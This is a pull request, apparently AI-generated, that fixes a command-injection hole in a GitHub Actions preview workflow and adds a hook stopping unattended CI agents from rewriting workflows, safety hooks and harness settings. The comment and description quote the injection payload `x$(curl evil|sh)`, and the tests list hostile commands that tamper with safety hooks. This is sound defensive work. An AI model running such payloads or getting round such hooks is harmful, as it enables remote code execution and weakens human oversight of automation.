### PR TITLE
WP-113: sikkerhet — preview-deploy-injeksjon fikset + CI-skrivevakt for beskyttede stier

### DIFF
--- a/.claude/settings.json
+++ b/.claude/settings.json
@@ -7,6 +7,10 @@
 					{
 						"type": "command",
 						"command": "node \"$CLAUDE_PROJECT_DIR/scripts/hooks/protect-interests.js\""
+					},
+					{
+						"type": "command",
+						"command": "node \"$CLAUDE_PROJECT_DIR/scripts/hooks/protect-automation.js\""
 					}
 				]
 			}

--- a/.github/workflows/preview-deploy.yml
+++ b/.github/workflows/preview-deploy.yml
@@ -52,7 +52,22 @@ jobs:
         uses: actions/github-script@v7
         with:
           script: |
-            const { execSync } = require('child_process');
+            // SECURITY: a PR's head-branch name (pr.head.ref) is attacker-controlled
+            // on a public repo — a fork PR author picks it. This step used to splice
+            // it UNSANITISED into shell strings: execSync(`git fetch origin ${branch} …`).
+            // A branch like `x$(curl evil|sh)` is a valid git ref, so the `$(…)` ran in
+            // the shell on every push to main → remote code execution. Two defenses now
+            // stack: (1) no shell — execFileSync passes args straight to git as an array,
+            // so a name can never be re-parsed; (2) we fetch by the NUMERIC pull ref
+            // (pr.number, never injectable) and refuse any branch name that is not a
+            // plain git ref. We also skip fork PRs entirely, preserving the prior
+            // behaviour (their branch was never on origin, so they were already skipped)
+            // and keeping untrusted fork content off the Pages site.
+            const { execFileSync } = require('child_process');
+            const fs = require('fs');
+            const git = (args) => execFileSync('git', args, { stdio: 'inherit' });
+            const SAFE_REF = /^[A-Za-z0-9._/-]+$/;
+            const baseRepo = `${context.repo.owner}/${context.repo.repo}`;
             const { data: prs } = await github.rest.pulls.list({
               owner: context.repo.owner,
               repo: context.repo.repo,
@@ -61,18 +76,33 @@ jobs:
             });
             for (const pr of prs) {
               const branch = pr.head.ref;
+              // Only same-repo branch PRs (the self-fixing loops) get previews.
+              const headRepo = pr.head.repo && pr.head.repo.full_name;
+              if (headRepo !== baseRepo) {
+                console.log(`Skipping PR #${pr.number}: fork or unknown head repo (${headRepo || 'none'})`);
+                continue;
+              }
+              // Defense in depth: the name must be a plain git ref even though it no
+              // longer reaches a shell.
+              if (typeof branch !== 'string' || !SAFE_REF.test(branch)) {
+                console.log(`Skipping PR #${pr.number}: unsafe branch name`);
+                continue;
+              }
               const slug = branch.replace(/[^a-zA-Z0-9-]/g, '-');
+              const dest = `_site/preview/${slug}`;
               console.log(`Assembling preview for PR #${pr.number}: ${branch} → /preview/${slug}/`);
               try {
-                execSync(`git fetch origin ${branch} --depth=1`, { stdio: 'inherit' });
-                execSync(`git checkout origin/${branch} -- docs/`, { stdio: 'inherit' });
-                execSync(`mkdir -p _site/preview/${slug}`, { stdio: 'inherit' });
-                execSync(`cp -r docs/* _site/preview/${slug}/`, { stdio: 'inherit' });
-                execSync(`git checkout main -- docs/`, { stdio: 'inherit' });
+                // refs/pull/<n>/head resolves to the PR's head commit for same-repo and
+                // fork PRs alike; <n> is an integer, so nothing user-controlled is passed.
+                git(['fetch', 'origin', `refs/pull/${pr.number}/head`, '--depth=1']);
+                git(['checkout', 'FETCH_HEAD', '--', 'docs/']);
+                fs.mkdirSync(dest, { recursive: true });
+                fs.cpSync('docs', dest, { recursive: true });
+                git(['checkout', 'main', '--', 'docs/']);
                 console.log(`  ✓ Preview ready at /preview/${slug}/`);
               } catch (err) {
                 console.log(`  ✗ Skipped: ${err.message}`);
-                try { execSync(`git checkout main -- docs/`, { stdio: 'inherit' }); } catch {}
+                try { git(['checkout', 'main', '--', 'docs/']); } catch {}
               }
             }
 

--- a/scripts/hooks/protect-automation.js
+++ b/scripts/hooks/protect-automation.js
@@ -1,0 +1,86 @@
+#!/usr/bin/env node
+// PreToolUse hook: blocks the AUTONOMOUS CI agents from mutating the automation's
+// OWN protected paths — the workflow definitions, composite actions, safety hooks,
+// and the harness settings that wire them. These are four of the five
+// never-auto-merged paths (see CLAUDE.md "Autonomy model" / scripts/merge-gate.js).
+//
+// Why a hook and not just merge-gate.js: merge-gate stops a PR-based self-fixing
+// loop's protected-path change from AUTO-merging, but the five DIRECT-PUSHING
+// agents (research/verify/editorial/scout/coverage-critic) commit straight to main
+// with NO gate, and main has no branch protection. Without this hook a buggy or
+// prompt-injected direct-pusher could rewrite a workflow or disable a safety hook
+// and have it land on main unreviewed. This closes that gap at the harness level,
+// the same way protect-interests.js guards the user-owned config. It applies to
+// EVERY CI agent (the PR loops included): a protected-path change must be authored
+// by a human, not any unattended agent — merge-gate.js then remains as complementary
+// defense-in-depth for anything that still reaches a branch.
+//
+// CI-only, exactly like protect-interests.js: the threat is an UNATTENDED agent. A
+// human in a local Claude Code session IS the operator editing their own
+// automation, so the hook exits 0 and stays out of the way. Exit 2 blocks the tool
+// call and feeds stderr back to the agent.
+//
+// (interests.json is the fifth protected path; it keeps its own dedicated,
+// user-owned message in protect-interests.js and is intentionally not repeated
+// here.)
+
+const IN_CI = process.env.GITHUB_ACTIONS === "true" || process.env.CI === "true";
+
+// True when `raw` (however rooted: absolute, repo-relative, or bare-relative)
+// names a protected automation FILE. The three directory classes require a file
+// under them; the harness settings is the one exact file.
+function isProtectedPath(raw) {
+	const s = String(raw || "").replace(/\\/g, "/");
+	return (
+		/(^|\/)\.github\/workflows\/[^/]/.test(s) ||
+		/(^|\/)\.github\/actions\/[^/]/.test(s) ||
+		/(^|\/)scripts\/hooks\/[^/]/.test(s) ||
+		/(^|\/)\.claude\/settings\.json$/.test(s)
+	);
+}
+
+// True when a Bash command WRITES to one of the protected paths. Same philosophy
+// as protect-interests.js: cover the mutation verbs agents actually use (shell
+// redirect, tee, in-place editors, node fs writes) — reads/greps pass. This is
+// defense-in-depth, not a sandbox; the Write/Edit path above is the real channel.
+function bashMutatesProtected(cmd) {
+	const frag = String.raw`(?:\.github\/(?:workflows|actions)\/|scripts\/hooks\/|\.claude\/settings\.json)`;
+	const redirectsInto = new RegExp(String.raw`>>?\s*[^\s;&|<>]*${frag}`).test(cmd);
+	const pipesInto = new RegExp(String.raw`\btee\b[^;&|]*${frag}`).test(cmd);
+	const mutatesInPlace = new RegExp(String.raw`\b(?:sed\s+-i|mv|cp|rm|truncate|dd)\b[^;&|]*${frag}`).test(cmd);
+	const scriptWrites = new RegExp(String.raw`\bwrite(?:File(?:Sync)?)?\s*\([^)]*${frag}`).test(cmd);
+	return redirectsInto || pipesInto || mutatesInPlace || scriptWrites;
+}
+
+let raw = "";
+process.stdin.on("data", (d) => (raw += d));
+process.stdin.on("end", () => {
+	if (!IN_CI) process.exit(0); // local operator edits are the human's own automation
+	let input = {};
+	try {
+		input = JSON.parse(raw || "{}");
+	} catch {
+		process.exit(0); // malformed input — don't break the session
+	}
+	const tool = input.tool_name || "";
+	const ti = input.tool_input || {};
+
+	let touches = false;
+	if (tool === "Write" || tool === "Edit" || tool === "MultiEdit") {
+		if (isProtectedPath(ti.file_path)) touches = true;
+	}
+	if (tool === "Bash" && typeof ti.command === "string") {
+		if (bashMutatesProtected(ti.command)) touches = true;
+	}
+
+	if (touches) {
+		console.error(
+			"BLOCKED by hook: that path is a protected automation path (.github/workflows/**, " +
+			".github/actions/**, scripts/hooks/**, or .claude/settings.json). An unattended CI agent " +
+			"must not rewrite the workflows, composite actions, safety hooks, or harness settings that " +
+			"gate the automation itself. A human must author changes to these files."
+		);
+		process.exit(2);
+	}
+	process.exit(0);
+});

--- a/tests/hooks.test.js
+++ b/tests/hooks.test.js
@@ -101,6 +101,111 @@ describe("protect-interests hook (CI-gated: blocks autonomous agents, allows loc
 	});
 });
 
+describe("protect-automation hook (CI-gated: blocks agents from mutating protected automation paths)", () => {
+	const hook = "scripts/hooks/protect-automation.js";
+	const CI = { GITHUB_ACTIONS: "true" }; // simulate the claude-code-action environment
+
+	// One case per protected path class, incl. absolute AND bare-relative rooting.
+	const protectedFiles = [
+		["workflow (absolute)", "/repo/.github/workflows/research-agent.yml"],
+		["workflow (bare-relative)", ".github/workflows/research-agent.yml"],
+		["composite action (bare-relative)", ".github/actions/setup/action.yml"],
+		["safety hook (absolute)", "/repo/scripts/hooks/protect-interests.js"],
+		["safety hook (bare-relative)", "scripts/hooks/validate-after-write.js"],
+		["harness settings (absolute)", "/repo/.claude/settings.json"],
+		["harness settings (bare-relative)", ".claude/settings.json"],
+	];
+	for (const [label, file_path] of protectedFiles) {
+		it(`blocks Write to ${label} in CI with exit 2`, () => {
+			const r = runHook(hook, { tool_name: "Write", tool_input: { file_path, content: "x" } }, CI);
+			expect(r.status, file_path).toBe(2);
+			expect(r.stderr).toContain("protected automation path");
+		});
+		it(`blocks Edit to ${label} in CI`, () => {
+			const r = runHook(hook, { tool_name: "Edit", tool_input: { file_path, old_string: "a", new_string: "b" } }, CI);
+			expect(r.status, file_path).toBe(2);
+		});
+	}
+
+	it("blocks Bash redirect into a workflow file in CI", () => {
+		const r = runHook(hook, {
+			tool_name: "Bash",
+			tool_input: { command: "echo 'x' > .github/workflows/research-agent.yml" },
+		}, CI);
+		expect(r.status).toBe(2);
+	});
+
+	it("blocks Bash tee into settings.json in CI", () => {
+		const r = runHook(hook, {
+			tool_name: "Bash",
+			tool_input: { command: "echo '{}' | tee .claude/settings.json" },
+		}, CI);
+		expect(r.status).toBe(2);
+	});
+
+	it("blocks sed -i / mv targeting a safety hook or composite action in CI", () => {
+		for (const command of [
+			"sed -i '' 's/2/0/' scripts/hooks/protect-interests.js",
+			"mv /tmp/evil.yml .github/actions/setup/action.yml",
+		]) {
+			expect(runHook(hook, { tool_name: "Bash", tool_input: { command } }, CI).status, command).toBe(2);
+		}
+	});
+
+	it("blocks node -e writeFileSync targeting a workflow in CI", () => {
+		const r = runHook(hook, {
+			tool_name: "Bash",
+			tool_input: { command: `node -e "fs.writeFileSync('.github/workflows/x.yml','')"` },
+		}, CI);
+		expect(r.status).toBe(2);
+	});
+
+	it("ALLOWS a local operator (no CI) to edit a protected automation file", () => {
+		const r = spawnSync("node", [hook], {
+			input: JSON.stringify({ tool_name: "Write", tool_input: { file_path: "/repo/.github/workflows/research-agent.yml", content: "x" } }),
+			encoding: "utf-8",
+			env: { ...process.env, GITHUB_ACTIONS: "", CI: "" },
+		});
+		expect(r.status).toBe(0);
+	});
+
+	it("allows Bash reads of protected paths (even in CI)", () => {
+		for (const command of [
+			"cat .github/workflows/research-agent.yml",
+			"grep -rn matcher .claude/settings.json",
+			"ls scripts/hooks/",
+		]) {
+			expect(runHook(hook, { tool_name: "Bash", tool_input: { command } }, CI).status, command).toBe(0);
+		}
+	});
+
+	it("allows writes to non-protected files in CI (agents' contracted outputs)", () => {
+		for (const file_path of [
+			"/repo/docs/data/events.json",
+			"scripts/config/tracked.json",
+			"scripts/config/catalog.json",
+			"scripts/fetch/index.js",
+			"scripts/agents/research.md",
+			".claude/skills/norwegian-rights/SKILL.md",
+		]) {
+			expect(runHook(hook, { tool_name: "Write", tool_input: { file_path, content: "{}" } }, CI).status, file_path).toBe(0);
+		}
+	});
+
+	it("does not block a settings.json outside .claude/ in CI (only the harness one is protected)", () => {
+		const r = runHook(hook, {
+			tool_name: "Write",
+			tool_input: { file_path: "docs/settings.json", content: "{}" },
+		}, CI);
+		expect(r.status).toBe(0);
+	});
+
+	it("survives malformed input without blocking", () => {
+		const r = spawnSync("node", [hook], { input: "not json", encoding: "utf-8", env: { ...process.env, GITHUB_ACTIONS: "true" } });
+		expect(r.status).toBe(0);
+	});
+});
+
 describe("validate-after-write hook", () => {
 	const hook = "scripts/hooks/validate-after-write.js";
 


### PR DESCRIPTION
## WP-113 · Sikkerhet (BESKYTTEDE STIER — IKKE auto-merges)

> **Denne PR-en rører beskyttede stier og MÅ IKKE merges av noen agent eller hovedsesjon. Eieren reviewer og merger.** (`.github/workflows/**`, `scripts/hooks/**`, `.claude/settings.json`.)

Lukker de to funnene fra sikkerhetsgjennomgangen (spec: PLAN.md FASE 0I → WP-113).

---

### Funn A — RCE i `preview-deploy.yml` (høyest prioritet)

**Angrepsvektor.** Steget «Assemble PR previews» itererte alle åpne PR-er (inkl. forks) og splittet grennavnet `pr.head.ref` **uvasket** inn i shell-interpolerte `execSync`-kall:

```js
execSync(`git fetch origin ${branch} --depth=1`);
execSync(`git checkout origin/${branch} -- docs/`);
```

`pr.head.ref` er **angriper-kontrollert** på et offentlig repo — en fork-PR-forfatter velger grennavnet selv. Et navn som `` x$(curl evil|sh) `` er en **gyldig git-ref**, så `$(…)` kjøres av shellet under argument-ekspansjon — uavhengig av om `git` lykkes. Steget trigges ved **hver push til main** → vilkårlig kommando-kjøring i CI.

**Fiks (to lag, defense in depth):**
1. **Ingen shell.** `execSync(\`… ${branch}\`)` → `execFileSync('git', [...])` med argument-array. Et grennavn kan aldri re-parses av et shell.
2. **Ikke-injiserbar ref.** Henter via `refs/pull/<pr.number>/head` — `pr.number` er et heltall. Grennavnet brukes bare til `slug` (videre saneret til `[a-zA-Z0-9-]`).
3. **Grennavn-validering** mot `^[A-Za-z0-9._/-]+$` før bruk (belt-and-suspenders).
4. **Hopper over fork-PR-er** (`pr.head.repo.full_name !== <base>`) — bevarer tidligere oppførsel (fork-grener lå aldri på `origin`, så de ble allerede hoppet over) og holder untrusted fork-innhold av Pages-siden.
5. `mkdir -p`/`cp -r docs/*` (shell-glob) → `fs.mkdirSync`/`fs.cpSync`.

**Legitime PR-er uendret.** For same-repo-gren-PR-er (selvhelings-løkkene) løser `refs/pull/<n>/head` til nøyaktig samme commit som `origin/<branch>` gjorde → identisk preview-innhold.

**Manuell verifiseringsplan** (workflowen kan ikke kjøres lokalt):
- `node --check` på uttrukket script-logikk: **OK** (syntaks gyldig).
- Regex-oppførsel verifisert: metategn (`` $(…) ``, `` `…` ``, `;`) forkastes av `SAFE_REF`.
- Ved review/etter-merge: åpne en throwaway same-repo-gren-PR og bekreft at `/preview/<slug>/` fortsatt bygges i et deploy-run; bekreft i logg at et konstruert «unsafe branch name» / fork-PR logger «Skipping …» og ikke kjører noe.

---

### Funn B — håndhevingsgap: direkte-pushende agenter omgår merge-gaten

**Problem.** `merge-gate.js` stopper bare **auto-merge** av de tre PR-baserte løkkene (ui-fix/self-repair/improve). De **fem direkte-pushende** agentene (research/verify/editorial/scout/coverage-critic) commiter **rett til main uten gate**, og main har **ingen branch protection** (verifisert 19.07). En buggy eller prompt-injisert direkte-pusher kunne dermed skrive om en workflow eller deaktivere en sikkerhets-hook, og det ville lande ureviewet.

**Fiks.** Ny PreToolUse-hook `scripts/hooks/protect-automation.js` blokkerer `Write`/`Edit`/`MultiEdit`/`Bash`-mutasjoner av `.github/workflows/**`, `.github/actions/**`, `scripts/hooks/**` og `.claude/settings.json`. Wiret i `.claude/settings.json` ved siden av `protect-interests.js`.

**Designvalg — ny fil, ikke utvidelse av `protect-interests.js`:**
- **Ulik trusselmodell / melding.** `protect-interests.js` = «brukereid fil, AI skriver aldri her» (eierskap). `protect-automation.js` = «automatikkens egne porter/definisjoner; ingen ubetjent agent skriver her» (selvmodifikasjons-forsvar). Egen fil holder hver hook liten og enkeltformåls (samme mønster som resten av `scripts/hooks/`).
- **`interests.json` er den femte beskyttede stien**, men beholder sin dedikerte eier-melding i `protect-interests.js` og gjentas ikke her.
- **Samme CI-only-mønster** som `protect-interests.js`: fyrer kun når `GITHUB_ACTIONS`/`CI` er satt — en lokal operatør ER mennesket som redigerer sin egen automatikk, så hooken exit 0 lokalt.

**Bevisst avveining (til review):** hooken gjelder **alle** CI-agenter, også de tre PR-løkkene. En beskyttet-sti-endring må dermed **forfattes av et menneske** — de tre løkkene kan ikke lenger *foreslå* en beskyttet-sti-fiks som en review-PR. Det er strengere enn merge-gaten (som bare hindret auto-merge) og lukker Funn B fullstendig i én mekanisme. `merge-gate.js` beholdes uendret som komplementær defense-in-depth. Vil eier heller bevare løkkenes forslags-evne, kan en per-workflow env-allowlist legges til senere — men det ville måtte røre 8 workflow-filer og er utenfor denne pakkens navngitte stier.

---

### Tester
- `tests/hooks.test.js`: ny `protect-automation`-blokk — blokk i CI for alle fire sti-klassene (inkl. absolutte OG bare-relative stier), Bash redirect/tee/`sed -i`/`mv`/`node writeFileSync`; tillatt lokalt; lesing/grep tillatt; agent-outputs (`tracked.json`/`catalog.json`/`research.md`/skills) ikke blokkert; `settings.json` utenfor `.claude/` ikke blokkert; malformed input bryter ikke økten.
- `npx vitest run --maxWorkers=1`: **44 filer / 651 tester grønn** (porten: hooks- + workflows-koherens-testene).

### Ikke-mål (respektert)
- Ingen endring i `scripts/merge-gate.js` (den er korrekt).
- Ingen GitHub-ruleset/branch-protection-endringer (eier vurderer separat).

🤖 Generated with [Claude Code](https://claude.com/claude-code)